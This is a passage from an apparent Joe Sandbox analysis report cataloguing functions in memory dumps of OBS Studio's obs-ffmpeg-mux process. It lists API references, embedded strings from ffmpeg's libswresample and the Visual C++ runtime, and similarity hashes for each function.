Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$strlen$memcpy$_aligned_realloc
String ID: %lld
API String ID: 3853940031-1962030014
Opcode ID: 8ef0d90d922d738ed908a9e8d1ebc5c3fb02acdd9b45e12231443154cef6d25c
Instruction ID: 042c7fbedddffe45dc9cb7dadcf4ca7fdf485b9293c49ac0c715493179679128
Opcode Fuzzy Hash: 8ef0d90d922d738ed908a9e8d1ebc5c3fb02acdd9b45e12231443154cef6d25c
Instruction Fuzzy Hash: 2261DD72A0BA42A5EBA59F15A51067E63A0FF88BD4F044534EE4D47785FF3CE542E380

Function 00007FF8A7C9AF60 Relevance: 16.7, APIs: 11, Instructions: 159sleepCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32 ref: 00007FF8A7C9AFE2
Sleep.KERNEL32 ref: 00007FF8A7C9AFF7

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: CreateEventSleep
String ID:
API String ID: 3100162736-0
Opcode ID: e5aaf2775736aee3134771c4ec912a0918e928d2149e6c1679b1ab5e8eb6a53e
Instruction ID: 8f3094466886edd567e8fb830a5a410d3b4664345b93d1de282d13a5262e461e
Opcode Fuzzy Hash: e5aaf2775736aee3134771c4ec912a0918e928d2149e6c1679b1ab5e8eb6a53e
Instruction Fuzzy Hash: 10519072A0AA02E6E7919F25A948BAF32A5EB447E4F014735DE69473D1DF3CD885E300

Function 00007FF8BFB59B80 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 426COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BFB58F70: av_freep.AVUTIL-58 ref: 00007FF8BFB5909C

av_log.AVUTIL-58 ref: 00007FF8BFB5A2CE
abort.MSVCRT ref: 00007FF8BFB5A2D3

Strings

s->dither.noise.ch_count == preout->ch_count, xrefs: 00007FF8BFB5A304
?, xrefs: 00007FF8BFB59ED2
s->midbuf.ch_count == s->out.ch_count, xrefs: 00007FF8BFB5A2E7
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB5A2C3
s->midbuf.ch_count == s->used_ch_layout.nb_channels, xrefs: 00007FF8BFB5A2B7
s->in.planar, xrefs: 00007FF8BFB5A321
src/libswresample/swresample.c, xrefs: 00007FF8BFB5A2A8, 00007FF8BFB5A2D8, 00007FF8BFB5A2F5, 00007FF8BFB5A312

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abortav_freepav_log
String ID: ?$Assertion %s failed at %s:%d$s->dither.noise.ch_count == preout->ch_count$s->in.planar$s->midbuf.ch_count == s->out.ch_count$s->midbuf.ch_count == s->used_ch_layout.nb_channels$src/libswresample/swresample.c
API String ID: 3736396223-3190629393
Opcode ID: d26e443fe19845a36fdde429c2a9a759add677dece32294348b5e2c239672df1
Instruction ID: 537e43ed3cddf1cb8e176ae39bd36429b02257f097ab387260e42451b7cd357a
Opcode Fuzzy Hash: d26e443fe19845a36fdde429c2a9a759add677dece32294348b5e2c239672df1
Instruction Fuzzy Hash: 1E02E072A0869686E7209FAA94607BAB7A5FB45BC8F580036DF4D5B788DF3CF444C710

Function 00007FF8BFB8E350 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 196COMMON

Download Yara Rule

Strings

`generic-type-, xrefs: 00007FF8BFB8E491
template-parameter-, xrefs: 00007FF8BFB8E417
`template-parameter-, xrefs: 00007FF8BFB8E44A
generic-type-, xrefs: 00007FF8BFB8E45E

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
API String ID: 0-3207858774
Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction ID: 3eda163644d6c9d6704849bba501ec1a87a5471fbedaa3212919024432804a1b
Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
Instruction Fuzzy Hash: F1916B22A08A4699FB11DBE9D4502FC37A1AB95BC8F88813ADB4D037A6DF3CE505C740

Function 00007FF8A7C89990 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C89AF8

Strings

-, xrefs: 00007FF8A7C89A98

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: -
API String ID: 2918714741-2547889144
Opcode ID: f978b8ec28ce8a6f9b5e47dd2052fece94246ae97b2b9cc28d4a0647f4bf6175
Instruction ID: fc51648e0898abfaaefe6ccd891b2da4f61009866848bed0f02877a0ab5bdb81
Opcode Fuzzy Hash: f978b8ec28ce8a6f9b5e47dd2052fece94246ae97b2b9cc28d4a0647f4bf6175
Instruction Fuzzy Hash: 2D51F622F0F667A5FB758E2554103BD6681EF017EAF5A4630DD6E0A3C1ED3CE841A300

Function 00007FF8A7C89BF0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C89D38

Strings

ambisonic , xrefs: 00007FF8A7C89BF9
-, xrefs: 00007FF8A7C89CFA

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: -$ambisonic
API String ID: 2918714741-2876420257
Opcode ID: c1d0ba877cb9a5e33fb598b34b3d9939bb9d6dbd7a5e029ec6c2859871519c45
Instruction ID: dd85364cf3fc52811cd6bbfbc0a8d67c251a1b77e95be704280c410b5487182d
Opcode Fuzzy Hash: c1d0ba877cb9a5e33fb598b34b3d9939bb9d6dbd7a5e029ec6c2859871519c45
Instruction Fuzzy Hash: E4414662F0F55365FBA14E2198583BE26C2EF027E6F454932DD2E4A2C1ED3DF841A704

Function 00007FF8BFB8A13C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A198

Part of subcall function 00007FF8BFB8722C: DName::operator+=.LIBVCRUNTIME ref: 00007FF8BFB87247

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB8A2C5

Strings

class , xrefs: 00007FF8BFB8A2DA
union , xrefs: 00007FF8BFB8A2F2
coclass , xrefs: 00007FF8BFB8A27E
cointerface , xrefs: 00007FF8BFB8A26C
`unknown ecsu', xrefs: 00007FF8BFB8A164
enum , xrefs: 00007FF8BFB8A287
struct , xrefs: 00007FF8BFB8A2E9

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+$Name::operator+=
String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
API String ID: 179159573-1464470183
Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction ID: 57412be7b3d0433f7e5144368553e0a347e99db1b0a9cdd8ac94c1dc0354bfd9
Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
Instruction Fuzzy Hash: AF516B71F18A16A9FB24DBA8E8805FC77B5BB543C4F504239EF0D12A5ADF29E541C700

Function 00007FF8A7C0D3D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 110stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7BE5FB0: strlen.MSVCRT ref: 00007FF8A7BE5FC9

strspn.MSVCRT ref: 00007FF8A7C0D44B
_aligned_free.MSVCRT ref: 00007FF8A7C0D4BB
_aligned_free.MSVCRT ref: 00007FF8A7C0D4C3
_aligned_free.MSVCRT ref: 00007FF8A7C0D544
_aligned_free.MSVCRT ref: 00007FF8A7C0D54C
_aligned_free.MSVCRT ref: 00007FF8A7C0D57A

Strings

Setting entry with key '%s' to value '%s', xrefs: 00007FF8A7C0D40E
Missing key or no key/value separator found after key '%s', xrefs: 00007FF8A7C0D55B
Key '%s' not found., xrefs: 00007FF8A7C0D525

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$strlenstrspn
String ID: Key '%s' not found.$Missing key or no key/value separator found after key '%s'$Setting entry with key '%s' to value '%s'
API String ID: 1832283230-2858522012
Opcode ID: 6858625f83de9048fadb2900624906809c4cd63edab14c6c68f5989beb2d347c
Instruction ID: b56ac24a10f523039c12cb7b57e5923ee7b77077c0c033609503185736a23fd9
Opcode Fuzzy Hash: 6858625f83de9048fadb2900624906809c4cd63edab14c6c68f5989beb2d347c
Instruction Fuzzy Hash: 5941C351A0E682B0FB659E56A8007BE5B90FF85BC4F548431ED4E177D6CE3CE486E380

Function 00007FF8A7C09900 Relevance: 15.3, APIs: 1, Strings: 9, Instructions: 317stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF8A7C099A4

Strings

%-15s , xrefs: 00007FF8A7C099B0
I, xrefs: 00007FF8A7C09D30
%c%c%c%c%c%c%c%c%c%c%c, xrefs: 00007FF8A7C09B55
to , xrefs: 00007FF8A7C09C59
(from , xrefs: 00007FF8A7C09C1B
%-12s , xrefs: 00007FF8A7C09A5D
%s, xrefs: 00007FF8A7C09B9A
(default , xrefs: 00007FF8A7C09D46
%s%-17s , xrefs: 00007FF8A7C09A3D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: strcmp
String ID: %-15s $ %s%-17s $ %s$ (default $ (from $ I$ to $%-12s $%c%c%c%c%c%c%c%c%c%c%c
API String ID: 1004003707-1704579004
Opcode ID: 2ea16860b3427611d439ee252ee5f1f96aacb857c5cfc9ddd7f0c0fe524bede6
Instruction ID: 65af2fbece17ce0514670e2f91f29a4b113a6c2b68abd7b2f0a0dade0f3fd6ce
Opcode Fuzzy Hash: 2ea16860b3427611d439ee252ee5f1f96aacb857c5cfc9ddd7f0c0fe524bede6
Instruction Fuzzy Hash: CCC1D472B0AA42A6EB248F25E4407BE2761FB807D5F548135EA4E47B95DF3CE842D780

Function 00007FF8A7BEF640 Relevance: 15.2, APIs: 10, Instructions: 244stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A7BE5FB0: strlen.MSVCRT ref: 00007FF8A7BE5FC9

strspn.MSVCRT ref: 00007FF8A7BEF71E
_aligned_free.MSVCRT ref: 00007FF8A7BEF7E5
_aligned_free.MSVCRT ref: 00007FF8A7BEF7ED

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$strlenstrspn
String ID:
API String ID: 1832283230-0
Opcode ID: 26bc88a9fd69d679ea30a0b0f13b4c0f719b999fe5c0e19c8c29863e318b563f
Instruction ID: f7e1f3401b3ff36b8adf21baa42cc421f852e157225a3139d5a119db98260d06
Opcode Fuzzy Hash: 26bc88a9fd69d679ea30a0b0f13b4c0f719b999fe5c0e19c8c29863e318b563f
Instruction Fuzzy Hash: 8AA17F72A0AA82A5EF55DF15E45437EA7A0EF84BC0F044135EA8D47795EF3CE842E780

Function 00007FF8BFB888E4 Relevance: 15.2, APIs: 10, Instructions: 150COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB889AE
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB889BE
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88A0A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88A1A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88A2A
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88A9D
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88AAE
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88AC0
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88AEC
DName::operator+.LIBVCRUNTIME ref: 00007FF8BFB88AFB

Memory Dump Source

Source File: 0000000B.00000002.2302298136.00007FF8BFB81000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB80000, based on PE: true

Associated: 0000000B.00000002.2302272872.00007FF8BFB80000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302325430.00007FF8BFB91000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302347339.00007FF8BFB96000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.2302366360.00007FF8BFB97000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb80000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction ID: ca57e452659b303addd90072ce14749a0d8f0947a53c3af6a316747859f549fc
Opcode Fuzzy Hash: 28d39e64d2900046752fe00e0d170ae61e4b908a297697eb59c3c366de5be272
Instruction Fuzzy Hash: 67614962B14B6699FB00DBE8D8801EC37B2BB84788F505436EF4D6BA9ADF78D545C340

Function 00007FF8A7BF09B0 Relevance: 15.1, APIs: 10, Instructions: 135COMMON

Download Yara Rule

APIs

_aligned_free.MSVCRT ref: 00007FF8A7BF0AA6
_aligned_free.MSVCRT ref: 00007FF8A7BF0ADD
_aligned_free.MSVCRT ref: 00007FF8A7BF0AFA
_aligned_free.MSVCRT ref: 00007FF8A7BF0B03
_aligned_free.MSVCRT ref: 00007FF8A7BF0B0C
_aligned_free.MSVCRT ref: 00007FF8A7BF0B14
_aligned_free.MSVCRT ref: 00007FF8A7BF0B1D
_aligned_free.MSVCRT ref: 00007FF8A7BF0B27
_aligned_free.MSVCRT ref: 00007FF8A7BF0B31
_aligned_free.MSVCRT ref: 00007FF8A7BF0B3C

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free
String ID:
API String ID: 2229574080-0
Opcode ID: 5319d01e5d1025e7fc0068ae3d94082f79af11993daff4612deb7ef89ba06dda
Instruction ID: 98ee6debe6a87f508c6dccd11b032b404d8e828a664f120cdaea33b537a0cbc4
Opcode Fuzzy Hash: 5319d01e5d1025e7fc0068ae3d94082f79af11993daff4612deb7ef89ba06dda
Instruction Fuzzy Hash: 17416F76A0B616A1EB56AF15844977E2399EF84BC4F060439DE4D07392DEBCEC42E380

Function 00007FF8A7C99840 Relevance: 15.1, APIs: 10, Instructions: 100COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF8A7C9985D

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: de550876fdf94b650e17a9c6284cbc8fe7517bb1ab88a7b2ec8df1b363e153e6
Instruction ID: ccedb131b328c8fb27722a4e943c1cf8a0919f718d947bdc38fd277a7241f734
Opcode Fuzzy Hash: de550876fdf94b650e17a9c6284cbc8fe7517bb1ab88a7b2ec8df1b363e153e6
Instruction Fuzzy Hash: 5E316B72A0AB02A6EB919F25E80436D76A4FB44BD9F445239DE5C063E8EF3CE444D704

Function 00007FF8BFB55C20 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

Assertion %s failed at %s:%d, xrefs: 00007FF8BFB561EB
src/libswresample/rematrix.c, xrefs: 00007FF8BFB561D0, 00007FF8BFB56200
s-> in_ch_layout.order == AV_CHANNEL_ORDER_UNSPEC || in ->ch_count == s->in_ch_layout.nb_channels, xrefs: 00007FF8BFB5620F
s->out_ch_layout.order == AV_CHANNEL_ORDER_UNSPEC || out->ch_count == s->out_ch_layout.nb_channels, xrefs: 00007FF8BFB561DF

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Assertion %s failed at %s:%d$s-> in_ch_layout.order == AV_CHANNEL_ORDER_UNSPEC || in ->ch_count == s->in_ch_layout.nb_channels$s->out_ch_layout.order == AV_CHANNEL_ORDER_UNSPEC || out->ch_count == s->out_ch_layout.nb_channels$src/libswresample/rematrix.c
API String ID: 0-729179064
Opcode ID: 497491d05170ef8247b869581e7d03bb9a59682df4ab4db83a46a576b33f8865
Instruction ID: c6424993d13fb7ba8091519f3204d5ac6c8a1cad813ceaab799424074bf417b1
Opcode Fuzzy Hash: 497491d05170ef8247b869581e7d03bb9a59682df4ab4db83a46a576b33f8865
Instruction Fuzzy Hash: 7CE1DC73A08A8286DB208F99D054ABE7765FB447C9F465236DB4D17B98DF3CE146CB00

Function 00007FF8BFB831A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8BFB8333E
